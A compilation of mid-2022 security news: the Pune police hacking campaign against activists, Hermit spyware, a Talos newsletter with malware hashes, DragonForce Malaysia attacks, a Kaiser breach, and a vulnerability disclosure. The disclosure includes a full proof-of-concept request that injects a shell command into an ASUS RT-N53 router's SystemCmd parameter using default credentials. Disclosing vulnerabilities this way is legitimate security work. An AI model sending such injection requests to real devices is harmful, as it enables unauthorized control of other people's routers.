Plus: Firefox adds new privacy protections, a big Intel and AMD chip flaw, and more of the week’s top security news.

This week, WIRED revealed new details that link an Indian police force to a hacking campaign against human rights defenders and activists. Researchers at SentinelOne uncovered connections between the city of Pune’s police agency and evidence planted on the devices of activists, as part of a hacking campaign dubbed Modified Elephant. It is alleged that evidence was planted on the computers of activists Rona Wilson and Varvara Rao and then used to arrest the two men. Among other details, an unnamed security analyst at an email provider revealed to SentinelOne and WIRED that the email address and phone number of a Pune police official was set as the recovery email on hacked accounts.

Elsewhere, a new front is emerging in Russia’s war against Ukraine. In the occupied city of Kherson and other nearby regions, Russian forces are routing internet connections from Ukrainian internet service providers to Russian companies. Ukrainian officials tell WIRED the shifts are happening at a large scale and could result in people being subjected to Vladimir Putin’s surveillance and censorship machine.

Robocalls aren’t going away. There’s been progress in tackling the nuisance calls in recent years but the spammy calls are still prevalent. This week we looked into the roots of the problem and what can still be done in the fight against robocalls. We also looked at a new way for cops to collect your fingerprints. How censors in Shanghai haven’t been able to hide stories of the city’s dead during an aggressive Covid-19 lockdown. And the dwindling options facing WikiLeaks founder Julian Assange after the UK Home Office approved his extradition to the US, where he faces espionage and hacking charges.

But that's not all, folks. Each week we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there.

Viktor Muller Ferreira had a traumatic childhood. Growing up, his father and mother—who had adopted him—split up. His mother later died of pneumonia, and his aunt, who raised him, also passed away. The family didn’t have much money. At school, children bullied Ferreira for his looks and his weird accent. As a result, he didn’t have many friends.

One day when his aunt was out, a neighborhood boy came round and told Ferreira that he was the fairy tale character Grey Shadow and he was going to “devour” him. “This scared me so much that I spent the entire day in a small box out on the balcony, praying until my aunt came home.” As he grew older he worked in a garage, took an interest in journalism, and moved to Brazil to reunite with his estranged father and “restore my citizenship.”

Except, according to authorities in the Netherlands, none of that is true.

Dutch intelligence agency AVID claimed this week that “Viktor Muller Ferreira” is just a cover story and false identity for Sergey Vladimirovich Cherkasov, an alleged Russian intelligence officer belonging to the GRU military unit. AVID said it caught Cherkasov applying to be an intern at the International Criminal Court at The Hague, which is investigating potential war crimes in Russia’s wars against Ukraine and Georgia.

As well as stopping Cherkasov from obtaining the position at the ICC and sending him back to Brazil, the Dutch intelligence agency also published his long and detailed cover story. The four-page story, often known as a covert intelligence officer’s “legend,” details the background of the “Ferreira” identity. “The threat posed by this intelligence officer is deemed potentially very high,” AVID said in a statement.

Since outing “Ferreira,” more clues about his undercover life have emerged. Social media profiles belonging to “Ferreira” have been discovered by the investigative unit Bellingcat, as well as a blog and online CV. He also studied at Trinity College Dublin and Johns Hopkins University. Eugene Finkel, an associate professor at Johns Hopkins, who says he taught “Ferreira,” tweeted: “I wrote him a letter. A strong one, in fact. Yes, me. I wrote a reference letter for a GRU officer. I will never get over this fact. I hate everything about GRU, him, this story. I am so glad he was exposed.”

For years it’s been impossible to move backups of WhatsApp chats between Android and iOS, and vice versa. In August last year, WhatsApp announced it was starting to roll out the ability for people to move their data between iPhones and Android devices. Now, this week, the Meta-owned company says backups will work in the other direction too—from Android to iOS.

Processors from Intel and AMD are vulnerable to a new side-channel attack called Hertzbleed. The attack could allow the theft of cryptographic keys and data, as reported by BleepingComputer and DarkReading. Hertzbleed works by exploiting a common power-saving feature in chips—called dynamic frequency scaling (DVFS)—that could allow an attacker to steal data. Frequency changes in DVFS may be correlated with information being processed by chips, Intel says in a blog post. Despite this, neither Intel nor AMD appear to have plans to address the issue. However, the risk to end users seems low at the moment. The team of researchers who found Hertzbleed say ordinary users probably shouldn’t be worried.

Ever since Covid-19 started spreading in early 2020, technological systems have been developed to try to control its spread. In China, a mandatory health code system was created to monitor people’s health status—people with a red code are required to self-isolate, those with a green code are allowed to move freely. These health codes are tied to people’s phones. Now, according to multiple reports, people in the Chinese province of Henan claim their plans to protest have been blocked as their health code has been turned red. Several people impacted claim they have not been around anyone positive with Covid-19 and the change is an abuse of power by officials.

Mozilla’s web browser may have been struggling in recent years, but it is still one of the most privacy-friendly browsers. This week the company said Firefox is turning on its Total Cookie Protection feature by default for everyone using the browser. Any cookies saved to your computer will be available only to the website that placed them there, Mozilla explains in a blog post. “Instead of allowing trackers to link up your behavior on multiple sites, they just get to see behavior on individual sites,” the company says, adding it is “Firefox’s strongest privacy protection to date.”

In November 2021, the US sanctioned notorious Israeli spyware firm NSO Group. The company’s Pegasus hacking tool has been used around the world to spy on journalists and activists. This week it emerged that US defense firm L3Harris is interested in purchasing the technology behind Pegasus, as the _Financial Times_ reports. Any purchase of the technology by a US company would potentially put it at odds with the Biden administration, which blacklisted NSO. Talk of the potential deal, which was said to be in early stages, has prompted criticism from the White House. “We are deeply concerned,” a senior official told the _Washington Post_. They said the deal could cause security and counterintelligence issues for the US.

An Alleged Russian Spy Was Busted Trying to Intern at The Hague

ASUS RT-N53 3.0.0.4.376.3754 has a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface.

Permalink

Cannot retrieve contributors at this time

There is a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface in RT-N53

**http://ip/apply.cgi**

    
    
    RT-N53 (Version 3.0.0.4.376.3754)
    
    GET /apply.cgi?current_page=Main_WOL_Content.asp&next_page=Main_WOL_Content.asp&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ether-wake+-i+br0+whoami&firmver=3.0.0.4&destIP=ccccc&wollist_deviceName=&wollist_macAddr= HTTP/1.1 
    Host: 192.168.1.1 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.1.1/Main_WOL_Content.asp 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Cookie: clock_type=1; hwaddr=52:54:00:12:34:57; bw_24refresh=1; ymd=2; bw_rtab=WIRELESS1 
    Connection: close
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31874: uai-poc/command injection.md at main · jayus0821/uai-poc

An enterprise-grade surveillanceware dubbed Hermit has been put to use by entities operating from within Kazakhstan, Syria, and Italy over the years since 2019, new research has revealed.
Lookout attributed the spy software, which is equipped to target both Android and iOS, to an Italian company named RCS Lab S.p.A and Tykelab Srl, a telecom services provider which it suspects to be a front

An enterprise-grade surveillanceware dubbed **Hermit** has been put to use by entities operating from within Kazakhstan, Syria, and Italy over the years since 2019, new research has revealed.

Lookout attributed the spy software, which is equipped to target both Android and iOS, to an Italian company named RCS Lab S.p.A and Tykelab Srl, a telecom services provider which it suspects to be a front company. The San Francisco-based cybersecurity firm said it detected the campaign aimed at Kazakhstan in April 2022.

Hermit is modular and comes with myriad capabilities that allow it to "exploit a rooted device, record audio and make and redirect phone calls, as well as collect data such as call logs, contacts, photos, device location and SMS messages," Lookout researchers Justin Albrecht and Paul Shunk said in a new write-up.

The spyware is believed to be distributed via SMS messages that trick users into installing what are seemingly innocuous apps from Samsung, Vivo, and Oppo, which, when opened, loads a website from the impersonated company while stealthily activating the kill chain in the background.

Like other Android malware threats, Hermit is engineered to abuse its access to accessibility services and other core components of the operating system (i.e., contacts, camera, calendar, clipboard, etc.) for most of its malicious activities.

Android devices have been at the receiving end of spyware in the past. In November 2021, the threat actor tracked as APT-C-23 (aka Arid Viper) was linked to a wave of attacks targeting Middle East users with new variants of FrozenCell.

Then last month, Google's Threat Analysis Group (TAG) disclosed that at least government-backed actors located in Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain, and Indonesia are buying Android zero-day exploits for covert surveillance campaigns.

"RCS Lab, a known developer that has been active for over three decades, operates in the same market as Pegasus developer NSO Group Technologies and Gamma Group, which created FinFisher," the researchers noted.

"Collectively branded as 'lawful intercept' companies, they claim to only sell to customers with legitimate use for surveillanceware, such as intelligence and law enforcement agencies. In reality, such tools have often been abused under the guise of national security to spy on business executives, human rights activists, journalists, academics and government officials."

The findings come as the Israel-based NSO Group is said to be reportedly in talks to sell off its Pegasus technology to U.S. defense contractor L3Harris, the company that manufactures StingRay cellular phone trackers, prompting concerns that it could open the door for law enforcement's use of the controversial hacking tool.

The German maker behind FinFisher has been courting troubles of its own in the wake of raids conducted by investigating authorities in connection with suspected violations of foreign trading laws by way of selling its spyware in Turkey without obtaining the required license.

Earlier this March, it shut down its operations and filed for insolvency, Netzpolitik and Bloomberg reported, adding, "the office has been dissolved, the employees have been laid off, and business operations have ceased."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover 'Hermit' Android Spyware Used in Kazakhstan, Syria, and Italy

The commercial-grade surveillance software initially was used by law enforcement authorities in Italy in 2019, according to a new report.

Researchers have discovered an enterprise-grade Android family of modular spyware dubbed Hermit conducting surveillance on citizens of Kazakhstan by their government.

Lookout Threat Lab researchers - who spotted the spyware - surmise that the secretive Italian spyware vendor RCS Lab developed it and say Hermit was previously deployed by Italian authorities in a 2019 anti-corruption operation in Italy. The spyware also was found in northeastern Syria, home to the country's Kurdish majority and a site of ongoing crises, including the Syrian civil war.

Android devices have been abused with spyware in the past; Sophos researchers uncovered new variants of Android spyware linked to a Middle Eastern APT group back in November 2021. More recent analysis from Google TAG indicates at least eight governments from across the globe are buying Android zero-day exploits for covert surveillance purposes.

Mike Parkin, senior technical engineer at Vulcan Cyber, says spyware is a tool used by many actors worldwide, including criminal organizations, state or state-sponsored threat actors, national security, and law-enforcement organizations following their own mandates.

"Regardless of who is using it or what agenda they are working toward, these commercial- grade spyware tools can seriously threaten people's personal privacy," he says.

The highest profile spyware case in recent memory was the discovery of Pegasus, a legal surveillance software developed by Israeli company NSO Group. The news caused an international furor after it was found covertly installed on iOS and Android mobile phones belonging to human rights activists, journalists, and high-ranking members of governments.

**How Hermit Works**

Hermit first gets installed on a targeted device as a framework with minimal surveillance capability. Then it can download modules from a command-and-control (C2) server as instructed and activate the spying functionality built into these modules.

This modular approach masks the malware from automated analysis of the app and makes manual malware analysis significantly harder. In addition, it allows the malicious actor to enable and disable different functionalities in their surveillance campaign or the capabilities of a target device. Hermit can also alter its behavior as needed to evade analysis tools and processes.

"The modular design might also be part of the business model of the software vendor, allowing them to sell individual spying features as value-add line items," explains Paul Shunk, security researcher at Lookout, which published a report on Hermit today.

Shunk says the overall design and code quality of the malware stands out compared with many other samples he has seen. 

"It was clear this was professionally developed by creators with an understanding of software engineering best practices," he says. "Beyond that, it is not very often we come across malware \[that\] assumes it will be able to successfully exploit a device and make use of elevated root permissions."

The discovery of Hermit adds another puzzle piece to the picture of the secretive market for "lawful intercept" surveillance tools, he says.

"As in the cases of NSO, Cytrox, and other vendors, discovery of their customers usually exposes their claim that their product is only used for legitimate purposes as at least partially untrue," Shunk says.

One of the Hermit samples Lookout analyzed used a Kazakh language website as its decoy.

And the main C2 server used by the app was just a proxy, with the real C2 being hosted on an IP from Kazakhstan. 

"The combination of the targeting of Kazakh-speaking users and the location of the back-end C2 server is a strong indication that the campaign is controlled by an entity in Kazakhstan," Shunk says.

Lookout says an Apple iOS version of the spyware exists as well, but the research team was unable to obtain a sample to analyze.

**'MaliBot' Targets Online Banking**

Meanwhile, another Android-based malware family reared its head this week in the form of Malibot, which is targeting online banking customers in Spain and Italy with the capability to steal credentials and crypto wallets. The malware was discovered by F5 Labs while the security company was tracking the mobile banking Trojan FluBot.

The malware consists of two campaigns: Mining X, which presents a QR code that leads to the malware Android Package Kit, and TheCryptoApp, which attempts to dupe users into downloading a fake version of the popular cryptocurrency tracker app available on the Google Play Store. 

It's also able to steal or bypass multifactor authentication codes and trick victims into downloading the malware either via a direct SMS phishing message or via fake websites they're lured to.

"This is certainly one to pay attention to and F5 expects to see a broader range of targets as time goes on, especially given the versatility of the malware could, in principle, be used for a wider range of attacks than stealing credentials and cryptocurrency," F5 warns in a blog post.

Android Spyware 'Hermit' Discovered in Targeted Attacks

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
I’m still decompressing from Cisco Live and the most human interaction I’ve had in a year and a half.  
But after spending a few days on the show floor and interacting with everyone, there are a...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

I’m still decompressing from Cisco Live and the most human interaction I’ve had in a year and a half.  

But after spending a few days on the show floor and interacting with everyone, there are a few things that stand out to me about the state of security and what people are interested in at Cisco Live. So, I wanted to take some time to highlight a few things that stood out to me at this year’s Cisco Live. _Editor's note: The Threat Source newsletter will be on a summer break next week, so no new edition!_ 

**Don’t think about the worst **

A lot of our lightning talks at the Cisco Secure Pub this week centered around some crazy days, many of which left us scrambling — the Colonial Pipeline ransomware attack, Log4J, Kaseya, you name it. The problem is no one wants to think about how awful these days are. 

During these talks, I saw a lot of heads in the audience nodding around how we need to be prepared for the worst, but no one wants to talk about that. Who wants to be the one to predict the next Log4J? Unfortunately, it’s going to happen, we just don’t know when. That’s why things like Incident Response plans and playbooks are so important. 

You may not want to talk about the toughest day of your professional career, but it’s going to come, so we may as well embrace it and be ready. 

**A wink and a nod **

Speaking of these major incidents, it seems like a ton of major security events have happened since the last Cisco Live in person. While they were happening, it was all anyone could talk about. But in person, words like “SolarWinds” and “Kaseya” were all spoken in hush tones or were just vaguely referenced to in-person like “back then” or “the dark times.”  

If we are going to truly learn from these events, I feel like we need to speak about them openly and honestly. I try to have a judgment-free security zone because eventually, a breach is going to happen to everyone. So the point is not to shame someone when it happens, we should be discussing the lessons learned openly so we can do better next time, rather than trying to brush it under the rug. 

During these stretches, we were all busy and stressed and it made for some late nights. That’s OK, and it should be OK to talk about that, even if you’re within earshot of someone who was involved.

**We can’t replicate everything over the internet **

The future is hybrid work, there’s no doubt about it. And I’d be the first person to tell you I prefer working from home versus commuting to the office today. But I must admit — it’s tough to replicate the connections at conferences and shows over Webex. 

Meetings and 1:1 check-ins work great for virtual meeting platforms, but there’s something about just making a personal connection in-person to a stranger. I was working at the Talos booth this week and struck up a conversation with someone who worked in network operations for an NFL team. Being a huge NFL fan, I had all sorts of questions to ask about the ins and outs of his job and the organization, especially given Cisco Talos Incident Response’s recent work at the Super Bowl and NFL draft. 

Unfortunately, this isn’t something we’ve been able to capture virtually. That operations person and I exchanged information on what we’re seeing in the field, what pain points exist and even got to talking about the NFL offseason. My wife, boss and parents would be shocked to hear me say this — but I actually missed talking to people in person.    

**The one big thing **

Microsoft’s Patch Tuesday for this month included 40 high-severity vulnerabilities, including one critical issue. The most serious issue is CVE-2022-30136, a remote code execution vulnerability in the Windows Network File System (NFS) service, version NFSv4.1, with a severity score of near-maximum 9.8. An attacker can exploit the vulnerability over the network by making an unauthenticated, specially crafted call to an NFS service to execute remote code. To mitigate this vulnerability, users are advised to disable the vulnerable version NFSV4.1 and restart the NFS server or reboot the machine. 

> **Why do I care? **This month’s round of updates also includes a fix for the high-profile Follina vulnerability disclosed a few weeks ago. Attackers are actively exploiting this in the wild to deliver malware, so this is especially important to patch for immediately. Also, this release marks the official end of Internet Explorer, the Microsoft browser that’s been around for more than 25 years. As of Tuesday, Microsoft stopped officially supporting most versions of Explorer and disabled the IE desktop application. All Explorer users are encouraged to switch over to Microsoft Edge (or another web browser).   
> **So now what? **Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. And it goes without saying, but all Microsoft users should update their products as soon as possible. 

**Other news of note**

U.S. defense contractor L3Harris is in talks to acquire the controversial Israeli tech company NSO Group, the creators of the Pegasus spyware. Pegasus is known to be used by threat actors to track unwilling targets, including activists, journalists and government leaders. This has set off alarm bells for privacy experts and those following national security, and some are even calling on the White House to preemptively block any sort of deal. NSO Group is currently on a U.S. blacklist for working “contrary to the foreign policy and national security interests of the U.S.” (The Guardian, Haaretz) 

Apple unveiled the newest version of its iOS operating system for iPhones last week, including several new security features and improvements. Users will no longer have to download standalone versions of the operating system to implement security updates, and instead, the patches will be installed automatically. Another new feature is the ability to edit and unsend iMessages. However, security and privacy experts worry this ability could allow stalkers, harassers, and abusers to contact their victims and then hide any trace of their messages, leading some people to call on Apple to change the feature. (9To5Mac, Mac Rumors) 

A newly discovered Linux malware is extremely difficult to detect while spreading silently across a network. Security researchers call this campaign “Symbiote,” and it's already been spotted in the wild. Symbiote infects running Linux processes and steals user credentials, gains rootkit functionality and installs a backdoor for remote access. Once it infects the processes, it can become difficult to detect by the typical security software, and some researchers are wondering if it’s even possible to detect this attack. (ThreatPost, Ars Technica) 

**Can’t get enough Talos? **

*   Boosting Security Resilience and Defending the IT Ecosystem
*   Businesses need to be more aggressive with their cyber security, Cisco warns
*   Cisco unveils sweeping new cloud capabilities, SASE and WAN forecasting offerings
*   Deepfake attacks expected to be next major threat to businesses  
    

  

**Upcoming events where you can find Talos **

**BlackHat** **U.S.** (Aug. 6 - 11, 2022)  
Las Vegas, Nevada 

**DEF CON U.S.** (Aug. 11 - 14, 2022)  
Las Vegas, Nevada 

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** b2ef49a10d07df6db483e86516d2dfaaaa2f30f4a93dd152fa85f09f891cd049   
**MD5:** 067f9a24d630670f543d95a98cc199df **Typical Filename:** RzxDivert32.sys **Claimed Product:** WinDivert 1.4 driver   
**Detection Name:** W32.B2EF49A10D-95.SBX.TG 

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 **MD5:** 8c69830a50fb85d8a794fa46643493b2   
**Typical Filename:** AAct.exe **Claimed Product:** N/A    
**Detection Name:** PUA.Win.Dropper.Generic::1201

Threat Source newsletter (June 16, 2022) — Three top takeaways from Cisco Live

New details connect police in India to a plot to plant evidence on victims' computers that led to their arrest.

police forces around the world have increasingly used hacking tools to identify and track protesters, expose political dissidents’ secrets, and turn activists’ computers and phones into inescapable eavesdropping bugs. Now, new clues in a case in India connect law enforcement to a hacking campaign that used those tools to go an appalling step further: planting false incriminating files on targets’ computers that the same police then used as grounds to arrest and jail them. 

More than a year ago, forensic analysts revealed that unidentified hackers fabricated evidence on the computers of at least two activists arrested in Pune, India, in 2018, both of whom have languished in jail and, along with 13 others, face terrorism charges. Researchers at security firm Sentinel One and nonprofits Citizen Lab and Amnesty International have since linked that evidence fabrication to a broader hacking operation that targeted hundreds of individuals over nearly a decade, using phishing emails to infect targeted computers with spyware, as well as smartphone hacking tools sold by the Israeli hacking contractor NSO Group. But only now have Sentinel One’s researchers revealed ties between the hackers and a government entity: none other than the very same Indian police agency in the city of Pune that arrested multiple activists based on the fabricated evidence.

“There’s a provable connection between the individuals who arrested these folks and the individuals who planted the evidence,” says Juan Andres Guerrero-Saade, a security researcher at Sentinel One who, along with fellow researcher Tom Hegel, will present findings at the Black Hat security conference in August. “This is beyond ethically compromised. It is beyond callous. So we’re trying to put as much data forward as we can in the hopes of helping these victims.”

Sentinel One’s new findings that link the Pune City Police to the long-running hacking campaign, which the company has called Modified Elephant, center on two particular targets of the campaign: Rona Wilson and Varvara Rao. Both men are activists and human rights defenders who were jailed in 2018 as part of a group called the Bhima Koregaon 16, named for the village where violence between Hindus and Dalits—the group once known as “untouchables”—broke out earlier that year. (One of those 16 defendants, 84-year-old Jesuit priest Stan Swamy, died in jail last year after contracting Covid-19. Rao, who is 81 years old and in poor health, has been released on medical bail, which expires next month. Of the other 14, only one has been granted bail.)

Early last year, Arsenal Consulting, a digital forensics firm working on behalf of the defendants, analyzed the contents of Wilson’s laptop, along with that of another defendant, human rights lawyer Surendra Gadling. Arsenal analysts found that evidence had clearly been fabricated on both machines. In Wilson’s case, a piece of malware known as NetWire had added 32 files to a folder of the computer’s hard drive, including a letter in which Wilson appeared to be conspiring with a banned Maoist group to assassinate Indian prime minister Narendra Modi. The letter was, in fact, created with a version of Microsoft Word that Wilson had never used, and that had never even been installed on his computer. Arsenal also found that Wilson’s computer had been hacked to install the NetWire malware after he opened an attachment sent from Varvara Rao’s email account, which had itself been compromised by the same hackers. “This is one of the most serious cases involving evidence-tampering that Arsenal has ever encountered,” Arsenal’s president, Mark Spencer, wrote in his report to the Indian court.

In February, Sentinel One published a detailed report on Modified Elephant, analyzing the malware and server infrastructure used in the hacking campaign to show that the two cases of evidence fabrication Arsenal had analyzed were part of a much larger pattern: The hackers had targeted hundreds of activists, journalists, academics, and lawyers with phishing emails and malware since as early as 2012. But in that report, Sentinel One stopped short of identifying any individual or organization behind the Modified Elephant hackers, writing only that the “activity aligns sharply with Indian state interests.”

Now the researchers have gone further in nailing down the group’s affiliations. Working with a security analyst at a certain email provider—who also spoke to WIRED but asked that neither they nor their employer be named—Sentinel One learned that three of the victim email accounts compromised by the hackers in 2018 and 2019 had a recovery email address and phone number added as a backup mechanism. For those accounts, which belonged to Wilson, Rao, and an activist and professor at Delhi University named Hany Babu, the addition of a new recovery email and phone number appears to have been intended to allow the hacker to easily regain control of the accounts if their passwords were changed. To the researchers’ surprise, that recovery email on all three accounts included the full name of a police official in Pune who was closely involved in the Bhima Koregaon 16 case.

The three hacked accounts have other fingerprints that link them—and thus the Pune police—to the larger Modified Elephant hacking campaign: The email provider found that the hacked accounts were accessed from IP addresses that Sentinel One and Amnesty International had previously identified as those of Modified Elephant. In the case of Rona Wilson, the email provider security analyst says that Wilson’s email account received a phishing email in April 2018 and then appeared to be compromised by the hackers using those IPs, and at the same time the email and phone number linked to the Pune City Police were added as recovery contacts to the account. The analyst says Wilson’s email account was then itself used to send out other phishing emails to targets in the Bhima Koregaon case for at least two months before Wilson was arrested in June of 2018.

“We generally don’t tell people who targeted them, but I’m kind of tired of watching shit burn,” the security analyst at the email provider told WIRED of their decision to reveal the identifying evidence from the hacked accounts. “These guys are not going after terrorists. They’re going after human rights defenders and journalists. And it’s not right.”

To further confirm the link between the recovery email and phone number on the hacked accounts and the Pune City Police, WIRED turned to Citizen Lab security researcher John Scott-Railton, who along with researchers at Amnesty International had earlier revealed the extent of the hacking campaign against the Bhima Koregaon 16 and shown that the NSO hacking tool Pegasus had been used to target some of their smartphones. To prove that the Pune City Police controlled the recovery contacts on the hacked accounts, Scott-Railton dug up entries in open source databases of Indian mobile phone numbers and emails for the recovery phone number that linked it to an email address ending in pune@ic.in, a suffix for other email addresses used by police in Pune. Scott-Railton found that the number is also linked in the database to the recovery email address connected to the hacked accounts for the same Pune police official.

Separately, security researcher Zeshan Aziz found the recovery email address and phone number tied to the Pune police official’s name in the leaked database of TrueCaller, a caller ID and call-blocking app, and found the phone number linked to his name in the leaked database of iimjobs.com, an Indian job recruitment website. Finally, Aziz found the recovery phone number listed with the official’s name on multiple archived web directories for Indian police, including on the website of the Pune City Police. (WIRED also verified that at the time the accounts were compromised, the email provider would have sent a confirmation link or text message to any recovery contact information added to an email account, which suggests that the police did, in fact, control that email address and phone number.)

Scott-Railton further found that the WhatsApp profile photo for the recovery phone number added to the hacked accounts displays a selfie photo of the police official—a man who appears to be the same officer at police press conferences and even in one news photograph taken at the arrest of Varvara Rao.

WIRED reached out in multiple emails and phone calls to the Pune City Police and the Pune police official whose personal details were linked to the hacked accounts and received no reply.

One Mumbai-based defense attorney representing several of the Bhima Koregaon 16, Mihir Desai, says he would need to independently corroborate the new evidence of the Pune police’s links to the hacking campaign. But taken at face value, he says, it appears “very damning.” He adds that he is hopeful it could help his clients, including Anand Teltumbde, who has been accused of terrorist connections based in part on an apparently fabricated document found on Rona Wilson’s computer. “We’ve known things have been planted, but the police could have always said, ‘we are not involved in all this,’” says Desai. “By showing the police did this, it would mean there was a conspiracy to arrest these people. It would show the police have acted in a vicious and deliberate manner knowing fully well this was false evidence.”

The conclusion that Pune police are tied to a hacking campaign that appears to have framed and jailed human rights activists presents a disturbing new example of the dangers of hacking tools in the hands of law enforcement—even in an ostensible democracy like India. Sentinel One’s Guerrero-Saade argues that it also raises questions about the validity of any evidence pulled from a computer that’s been hacked by a law enforcement surveillance operation. “This should invite a conversation about whether we can trust law enforcement with these sorts of malware operations at all,” says Guerrero-Saade. “What does it mean to have evidentiary integrity when you have a compromised device? What does it mean for somebody to hack a device for fact-finding in a law enforcement operation when they can also alter the contents of the device in question?”

Beyond any larger questions, Guerrero-Saade and his fellow Sentinel One researcher Tom Hegel say they’re focused on the fate of the victims in the Bhima Koregaon case, almost all of whom have remained in jail even as the evidence against them proves to be more corrupt with every year. Ultimately, the researchers hope their findings can not only demonstrate police wrongdoing in the case, but win those activists and human rights defenders their freedom. “The real concern here is the folks languishing in prison,” says Guerrero-Saade. “We’re hoping this leads to some form of justice.”

Police Linked to Hacking Campaign to Frame Indian Activists

In response to a comment about the Prophet Mohammed, a hacktivist group in Malaysia has unleashed a wave of cyber attacks in India.

In response to a comment about the Prophet Mohammed, a hacktivist group in Malaysia has unleashed a wave of cyber attacks in India.

According to a new advisory from Radware, a hacktivist group called DragonForce Malaysia, “with the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.” In addition to DDoS, their targeted campaign – dubbed “OpsPatuk” – involves advanced threat actors “leveraging current exploits, breaching networks and leaking data.”

DragonForce Malaysia – best known for their hacktivism in support of the Palestinian cause – have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.

According to the advisory, OpsPatuk remains ongoing today.

**The Casus Belli**

In a televised debate last month, Nupur Sharma – a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) – made controversial remarks regarding the age of the Prophet Mohammed’s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the outsting of Sharma herself from BJP.

Then, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a tweet:

_Greetings The Government of India._ _We Are DragonForce Malaysia._ _This is a special operation on the insult of our Prophet Muhammad S.A.W._ _India Government website hacked by DragonForce Malaysia. We will never remain silent._ _Come Join This Operation !_ _#OpsPatuk Engaged_

(image from @DragonForceIO on Twitter)

The new advisory confirms that the group has used DDoS to perform “numerous defacements across India,” pasting their logo and messaging to targeted websites.

The group also “claimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.”

The researchers also observed other hacktivists – ‘Localhost’, ‘M4NGTX’, ‘1887’, and ‘RzkyO’ – joining the party, “defacing multiple websites across India in the name of their religion.”

**Who are DragonForce Malaysia?**

DragonForce Malaysia is a hacktivist group in the vein of Anonymous. They’re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums – used for everything “ranging from running an eSports team to launching cyberattacks” – are visited by tens of thousands of users.

In the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations – #OpsBedil, #OpsBedilReloaded and #OpsRWM – against the nation and its citizens.

According to the authors of the advisory, DragonForce are “not considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.” Like Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools –  Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more – in choreographed, flashy website defacements.

Some members, “over the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.” Among other things, that’s included leveraing publicly disclosed vulnerabilities. In OpsPatuk, for example, they’ve been working with the recently discovered CVE-2022-26134.

“DragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,” concluded the authors. With no signs of slowing down, “Radware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.”

DragonForce Gang Unleash Hacks Against Govt. of India

Health plan provider plays down ID theft fears after breach at Washington state division

Health plan provider plays down ID theft fears after breach at Washington state division

The healthcare and personal information of up to 70,000 Kaiser Permanente patients in Washington state may have been exposed following unauthorized access to the US healthcare giant’s email system.

The data breach incident, which took place in early April, potentially exposed patients’ first and last name, medical record number, dates of service, and laboratory test result information of the health plan provider.

Catch up with the latest healthcare breaches and security news

Financially sensitive information (Social Security number and credit card numbers) were not exposed by the breach, according to the healthcare provider.

In a breach notice (PDF) issued earlier this month, Kaiser sought to reassure potentially affected members by stating that the security incident was promptly contained.

The organization said:

On April 5, 2022, Kaiser Permanente discovered that an unauthorized party gained access to an employee’s emails. We terminated the unauthorized access within hours after it began and promptly commenced an investigation to determine the scope of the incident.

We have determined that protected health information was contained in the emails and, while we have no indication that the information was accessed by the unauthorized party, we are unable to completely rule out the possibility.

Although there’s no evidence of identity theft or misuse of protected health information as a result of the security breach, Kaiser Permanente has nonetheless advised affected parties to be on the lookout for potential fraud.

Although not specified in Kaiser’s breach notice, regulators from the US Department of Health and Human Services Office for Civil Rights reports that 69,589 records were potentially exposed as a result of the email security slip-up at Kaiser’s Washington unit.

DON’T MISS Unpatched bug chain poses ‘mass account takeover’ threat to Yunmai weight monitoring app

In response to the incident, Kaiser said it promptly reset the employee’s password for the email account where unauthorized activity was detected.

